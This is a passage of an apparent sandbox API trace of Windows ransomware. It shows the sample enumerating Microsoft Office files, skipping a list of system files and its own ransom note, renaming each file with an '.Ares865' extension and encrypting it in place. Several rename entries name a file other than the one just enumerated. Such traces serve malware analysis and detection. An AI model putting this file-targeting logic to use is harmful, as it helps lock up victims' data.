dwFlags=0x0, lpMem=0x2d9b60 | out: hHeap=0x2b0000) returned 1 [0066.742] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0066.742] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0066.743] CloseHandle (hObject=0x120) returned 1 [0066.743] CloseHandle (hObject=0x12c) returned 1 [0066.743] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0066.743] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0066.743] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3240020 | out: hHeap=0x2b0000) returned 1 [0066.743] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x861bf100, ftCreationTime.dwHighDateTime=0x1cabc89, ftLastAccessTime.dwLowDateTime=0x5a9f29b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x861bf100, ftLastWriteTime.dwHighDateTime=0x1cabc89, nFileSizeHigh=0x0, nFileSizeLow=0x80fb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SLERROR.XML", cAlternateFileName="")) returned 1 [0066.743] lstrcmpiW (lpString1="SLERROR.XML", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0066.743] lstrcmpiW (lpString1="SLERROR.XML", lpString2="aoldtz.exe") returned 1 [0066.743] lstrcmpiW (lpString1="SLERROR.XML", lpString2=".") returned 1 [0066.743] lstrcmpiW (lpString1="SLERROR.XML", lpString2="..") returned 1 [0066.743] lstrcmpiW (lpString1="SLERROR.XML", lpString2="windows") returned -1 [0066.743] lstrcmpiW (lpString1="SLERROR.XML", lpString2="bootmgr") returned 1 [0066.743] lstrcmpiW (lpString1="SLERROR.XML", lpString2="temp") returned -1 [0066.743] lstrcmpiW (lpString1="SLERROR.XML", lpString2="pagefile.sys") returned 1 [0066.743] lstrcmpiW (lpString1="SLERROR.XML", lpString2="boot") returned 1 [0066.743] lstrcmpiW (lpString1="SLERROR.XML", lpString2="ids.txt") returned 1 [0066.743] lstrcmpiW (lpString1="SLERROR.XML", lpString2="ntuser.dat") returned 1 [0066.743] lstrcmpiW (lpString1="SLERROR.XML", lpString2="perflogs") returned 1 [0066.743] lstrcmpiW (lpString1="SLERROR.XML", lpString2="MSBuild") returned 1 [0066.743] lstrlenW (lpString="SLERROR.XML") returned 11 [0066.743] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\SketchPadTestSchema.xml") returned 66 [0066.743] lstrcpyW (in: lpString1=0x2e2e8b6, lpString2="SLERROR.XML" | out: lpString1="SLERROR.XML") returned="SLERROR.XML" [0066.743] lstrlenW (lpString="SLERROR.XML") returned 11 [0066.743] lstrlenW (lpString="Ares865") returned 7 [0066.743] lstrcmpiW (lpString1="ROR.XML", lpString2="Ares865") returned 1 [0066.744] lstrlenW (lpString=".dll") returned 4 [0066.744] lstrcmpiW (lpString1="SLERROR.XML", lpString2=".dll") returned 1 [0066.744] lstrlenW (lpString=".lnk") returned 4 [0066.744] lstrcmpiW (lpString1="SLERROR.XML", lpString2=".lnk") returned 1 [0066.744] lstrlenW (lpString=".ini") returned 4 [0066.744] lstrcmpiW (lpString1="SLERROR.XML", lpString2=".ini") returned 1 [0066.744] lstrlenW (lpString=".sys") returned 4 [0066.744] lstrcmpiW (lpString1="SLERROR.XML", lpString2=".sys") returned 1 [0066.744] lstrlenW (lpString="SLERROR.XML") returned 11 [0066.744] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\SLERROR.XML.Ares865") returned 62 [0066.744] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\SLERROR.XML" (normalized: "c:\\program files\\microsoft office\\office14\\slerror.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\SLERROR.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\slerror.xml.ares865"), dwFlags=0x1) returned 1 [0066.745] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\SLERROR.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\slerror.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0066.745] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=33019) returned 1 [0066.745] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0066.746] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0066.746] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0066.746] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0066.747] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0066.747] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0066.747] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x8400, lpName=0x0) returned 0x120 [0066.748] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x8400) returned 0x1a0000 [0066.768] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0066.768] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0066.768] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0066.768] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d30d0 [0066.768] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d30d0 | out: hHeap=0x2b0000) returned 1 [0066.768] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0066.768] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0066.768] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0066.768] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0066.768] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9b60 [0066.769] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0066.769] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9b60 | out: hHeap=0x2b0000) returned 1 [0066.769] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0066.769] UnmapViewOfFile (lpBaseAddress=0x1a0000) returned 1 [0066.769] CloseHandle (hObject=0x120) returned 1 [0066.769] CloseHandle (hObject=0x12c) returned 1 [0066.769] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0066.769] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0066.769] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3240020 | out: hHeap=0x2b0000) returned 1 [0066.770] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3ebbec00, ftCreationTime.dwHighDateTime=0x1cab8a8, ftLastAccessTime.dwLowDateTime=0x84cd39e0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x3ebbec00, ftLastWriteTime.dwHighDateTime=0x1cab8a8, nFileSizeHigh=0x0, nFileSizeLow=0x37d70, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SMIGRATE.DLL", cAlternateFileName="")) returned 1 [0066.770] lstrcmpiW (lpString1="SMIGRATE.DLL", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0066.770] lstrcmpiW (lpString1="SMIGRATE.DLL", lpString2="aoldtz.exe") returned 1 [0066.770] lstrcmpiW (lpString1="SMIGRATE.DLL", lpString2=".") returned 1 [0066.770] lstrcmpiW (lpString1="SMIGRATE.DLL", lpString2="..") returned 1 [0066.770] lstrcmpiW (lpString1="SMIGRATE.DLL", lpString2="windows") returned -1 [0066.770] lstrcmpiW (lpString1="SMIGRATE.DLL", lpString2="bootmgr") returned 1 [0066.770] lstrcmpiW (lpString1="SMIGRATE.DLL", lpString2="temp") returned -1 [0066.770] lstrcmpiW (lpString1="SMIGRATE.DLL", lpString2="pagefile.sys") returned 1 [0066.770] lstrcmpiW (lpString1="SMIGRATE.DLL", lpString2="boot") returned 1 [0066.770] lstrcmpiW (lpString1="SMIGRATE.DLL", lpString2="ids.txt") returned 1 [0066.770] lstrcmpiW (lpString1="SMIGRATE.DLL", lpString2="ntuser.dat") returned 1 [0066.770] lstrcmpiW (lpString1="SMIGRATE.DLL", lpString2="perflogs") returned 1 [0066.770] lstrcmpiW (lpString1="SMIGRATE.DLL", lpString2="MSBuild") returned 1 [0066.770] lstrlenW (lpString="SMIGRATE.DLL") returned 12 [0066.770] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\SLERROR.XML") returned 54 [0066.770] lstrcpyW (in: lpString1=0x2e2e8b6, lpString2="SMIGRATE.DLL" | out: lpString1="SMIGRATE.DLL") returned="SMIGRATE.DLL" [0066.770] lstrlenW (lpString="SMIGRATE.DLL") returned 12 [0066.770] lstrlenW (lpString="Ares865") returned 7 [0066.770] lstrcmpiW (lpString1="ATE.DLL", lpString2="Ares865") returned 1 [0066.770] lstrlenW (lpString=".dll") returned 4 [0066.770] lstrcmpiW (lpString1="SMIGRATE.DLL", lpString2=".dll") returned 1 [0066.770] lstrlenW (lpString=".lnk") returned 4 [0066.770] lstrcmpiW (lpString1="SMIGRATE.DLL", lpString2=".lnk") returned 1 [0066.771] lstrlenW (lpString=".ini") returned 4 [0066.771] lstrcmpiW (lpString1="SMIGRATE.DLL", lpString2=".ini") returned 1 [0066.771] lstrlenW (lpString=".sys") returned 4 [0066.771] lstrcmpiW (lpString1="SMIGRATE.DLL", lpString2=".sys") returned 1 [0066.771] lstrlenW (lpString="SMIGRATE.DLL") returned 12 [0066.772] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\Wordcnvpxy.cnv.Ares865") returned 65 [0066.772] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\Wordcnvpxy.cnv" (normalized: "c:\\program files\\microsoft office\\office14\\wordcnvpxy.cnv"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\Wordcnvpxy.cnv.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\wordcnvpxy.cnv.ares865"), dwFlags=0x1) returned 1 [0066.779] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Wordcnvpxy.cnv.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\wordcnvpxy.cnv.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0066.779] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=30048) returned 1 [0066.779] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0066.779] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d30d0 [0066.779] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0066.779] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0066.780] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0066.780] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0066.780] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7860, lpName=0x0) returned 0x120 [0066.782] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7860) returned 0x1a0000 [0066.788] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0066.789] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0066.789] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0066.789] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3238 [0066.789] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3238 | out: hHeap=0x2b0000) returned 1 [0066.789] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0066.789] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0066.789] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0066.789] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0066.789] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9b60 [0066.790] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0066.790] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9b60 | out: hHeap=0x2b0000) returned 1 [0066.790] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0066.790] UnmapViewOfFile (lpBaseAddress=0x1a0000) returned 1 [0066.790] CloseHandle (hObject=0x120) returned 1 [0066.790] CloseHandle (hObject=0x12c) returned 1 [0066.790] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d30d0 | out: hHeap=0x2b0000) returned 1 [0066.790] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0066.790] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3240020 | out: hHeap=0x2b0000) returned 1 [0066.790] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1653d000, ftCreationTime.dwHighDateTime=0x1cacd36, ftLastAccessTime.dwLowDateTime=0x5e60d530, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1653d000, ftLastWriteTime.dwHighDateTime=0x1cacd36, nFileSizeHigh=0x0, nFileSizeLow=0x62f60, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Wordcnvr.dll", cAlternateFileName="")) returned 1 [0066.791] lstrcmpiW (lpString1="Wordcnvr.dll", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0066.791] lstrcmpiW (lpString1="Wordcnvr.dll", lpString2="aoldtz.exe") returned 1 [0066.791] lstrcmpiW (lpString1="Wordcnvr.dll", lpString2=".") returned 1 [0066.791] lstrcmpiW (lpString1="Wordcnvr.dll", lpString2="..") returned 1 [0066.791] lstrcmpiW (lpString1="Wordcnvr.dll", lpString2="windows") returned 1 [0066.791] lstrcmpiW (lpString1="Wordcnvr.dll", lpString2="bootmgr") returned 1 [0066.791] lstrcmpiW (lpString1="Wordcnvr.dll", lpString2="temp") returned 1 [0066.791] lstrcmpiW (lpString1="Wordcnvr.dll", lpString2="pagefile.sys") returned 1 [0066.791] lstrcmpiW (lpString1="Wordcnvr.dll", lpString2="boot") returned 1 [0066.791] lstrcmpiW (lpString1="Wordcnvr.dll", lpString2="ids.txt") returned 1 [0066.791] lstrcmpiW (lpString1="Wordcnvr.dll", lpString2="ntuser.dat") returned 1 [0066.791] lstrcmpiW (lpString1="Wordcnvr.dll", lpString2="perflogs") returned 1 [0066.791] lstrcmpiW (lpString1="Wordcnvr.dll", lpString2="MSBuild") returned 1 [0066.791] lstrlenW (lpString="Wordcnvr.dll") returned 12 [0066.791] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Wordcnvpxy.cnv") returned 57 [0066.791] lstrcpyW (in: lpString1=0x2e2e8b6, lpString2="Wordcnvr.dll" | out: lpString1="Wordcnvr.dll") returned="Wordcnvr.dll" [0066.791] lstrlenW (lpString="Wordcnvr.dll") returned 12 [0066.791] lstrlenW (lpString="Ares865") returned 7 [0066.791] lstrcmpiW (lpString1="nvr.dll", lpString2="Ares865") returned 1 [0066.791] lstrlenW (lpString=".dll") returned 4 [0066.791] lstrcmpiW (lpString1="Wordcnvr.dll", lpString2=".dll") returned 1 [0066.791] lstrlenW (lpString=".lnk") returned 4 [0066.791] lstrcmpiW (lpString1="Wordcnvr.dll", lpString2=".lnk") returned 1 [0066.791] lstrlenW (lpString=".ini") returned 4 [0066.791] lstrcmpiW (lpString1="Wordcnvr.dll", lpString2=".ini") returned 1 [0066.791] lstrlenW (lpString=".sys") returned 4 [0066.791] lstrcmpiW (lpString1="Wordcnvr.dll", lpString2=".sys") returned 1 [0066.791] lstrlenW (lpString="Wordcnvr.dll") returned 12 [0066.791] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\WORDIRM.XML.Ares865") returned 62 [0066.792] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\WORDIRM.XML" (normalized: "c:\\program files\\microsoft office\\office14\\wordirm.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\WORDIRM.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\wordirm.xml.ares865"), dwFlags=0x1) returned 1 [0066.793] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\WORDIRM.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\wordirm.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0066.793] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=79676) returned 1 [0066.793] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0066.793] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d30d0 [0066.793] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0066.794] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0066.794] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0066.794] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0066.794] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a40, lpName=0x0) returned 0x120 [0066.796] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a40) returned 0x420000 [0066.810] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0066.811] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0066.811] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0066.811] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3238 [0066.811] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3238 | out: hHeap=0x2b0000) returned 1 [0066.811] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0066.811] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0066.811] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0066.811] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0066.811] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0066.811] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0066.811] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0066.811] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0066.811] UnmapViewOfFile (lpBaseAddress=0x420000) returned 1 [0066.812] CloseHandle (hObject=0x120) returned 1 [0066.812] CloseHandle (hObject=0x12c) returned 1 [0066.812] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d30d0 | out: hHeap=0x2b0000) returned 1 [0066.812] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0066.812] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3240020 | out: hHeap=0x2b0000) returned 1 [0066.813] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x424a0a00, ftCreationTime.dwHighDateTime=0x1c9244d, ftLastAccessTime.dwLowDateTime=0x7090d6b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x424a0a00, ftLastWriteTime.dwHighDateTime=0x1c9244d, nFileSizeHigh=0x0, nFileSizeLow=0x13584, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WORDIRMV.XML", cAlternateFileName="")) returned 1 [0066.813] lstrcmpiW (lpString1="WORDIRMV.XML", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0066.813] lstrcmpiW (lpString1="WORDIRMV.XML", lpString2="aoldtz.exe") returned 1 [0066.813] lstrcmpiW (lpString1="WORDIRMV.XML", lpString2=".") returned 1 [0066.813] lstrcmpiW (lpString1="WORDIRMV.XML", lpString2="..") returned 1 [0066.813] lstrcmpiW (lpString1="WORDIRMV.XML", lpString2="windows") returned 1 [0066.813] lstrcmpiW (lpString1="WORDIRMV.XML", lpString2="bootmgr") returned 1 [0066.813] lstrcmpiW (lpString1="WORDIRMV.XML", lpString2="temp") returned 1 [0066.813] lstrcmpiW (lpString1="WORDIRMV.XML", lpString2="pagefile.sys") returned 1 [0066.813] lstrcmpiW (lpString1="WORDIRMV.XML", lpString2="boot") returned 1 [0066.813] lstrcmpiW (lpString1="WORDIRMV.XML", lpString2="ids.txt") returned 1 [0066.813] lstrcmpiW (lpString1="WORDIRMV.XML", lpString2="ntuser.dat") returned 1 [0066.813] lstrcmpiW (lpString1="WORDIRMV.XML", lpString2="perflogs") returned 1 [0066.813] lstrcmpiW (lpString1="WORDIRMV.XML", lpString2="MSBuild") returned 1 [0066.813] lstrlenW (lpString="WORDIRMV.XML") returned 12 [0066.813] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\WORDIRM.XML") returned 54 [0066.813] lstrcpyW (in: lpString1=0x2e2e8b6, lpString2="WORDIRMV.XML" | out: lpString1="WORDIRMV.XML") returned="WORDIRMV.XML" [0066.813] lstrlenW (lpString="WORDIRMV.XML") returned 12 [0066.813] lstrlenW (lpString="Ares865") returned 7 [0066.813] lstrcmpiW (lpString1="RMV.XML", lpString2="Ares865") returned 1 [0066.813] lstrlenW (lpString=".dll") returned 4 [0066.813] lstrcmpiW (lpString1="WORDIRMV.XML", lpString2=".dll") returned 1 [0066.813] lstrlenW (lpString=".lnk") returned 4 [0066.813] lstrcmpiW (lpString1="WORDIRMV.XML", lpString2=".lnk") returned 1 [0066.813] lstrlenW (lpString=".ini") returned 4 [0066.813] lstrcmpiW (lpString1="WORDIRMV.XML", lpString2=".ini") returned 1 [0066.813] lstrlenW (lpString=".sys") returned 4 [0066.814] lstrcmpiW (lpString1="WORDIRMV.XML", lpString2=".sys") returned 1 [0066.814] lstrlenW (lpString="WORDIRMV.XML") returned 12 [0066.814] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\WORDIRMV.XML.Ares865") returned 63 [0066.814] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\WORDIRMV.XML" (normalized: "c:\\program files\\microsoft office\\office14\\wordirmv.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\WORDIRMV.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\wordirmv.xml.ares865"), dwFlags=0x1) returned 1 [0066.815] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\WORDIRMV.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\wordirmv.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0066.815] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=79236) returned 1 [0066.815] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0066.815] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d30d0 [0066.815] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0066.815] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0066.816] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0066.816] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0066.816] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13890, lpName=0x0) returned 0x120 [0066.818] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13890) returned 0x420000 [0066.834] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0066.835] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0066.835] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0066.835] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3238 [0066.835] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3238 | out: hHeap=0x2b0000) returned 1 [0066.835] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0066.835] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0066.835] HeapFree (in: 